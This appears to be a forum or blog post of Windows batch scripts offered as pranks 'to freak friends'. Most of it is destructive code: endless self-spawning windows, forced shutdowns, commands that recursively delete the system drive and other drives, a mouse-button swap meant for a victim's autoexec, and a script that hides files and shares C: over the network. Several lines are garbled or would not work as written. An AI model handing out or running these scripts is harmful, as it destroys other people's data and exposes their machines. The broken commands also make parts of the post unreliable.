Some Batch tricks to freak Friends

This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat
This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c “Shutdown”
Go to notepad and type the following:

@Echo off
Del C:\ *.*|y
save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
One more …
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc

A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?
@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
erase password.bat
erase password.dat
echo Turn off PC
goto hello
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g

A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)
@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it
A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60

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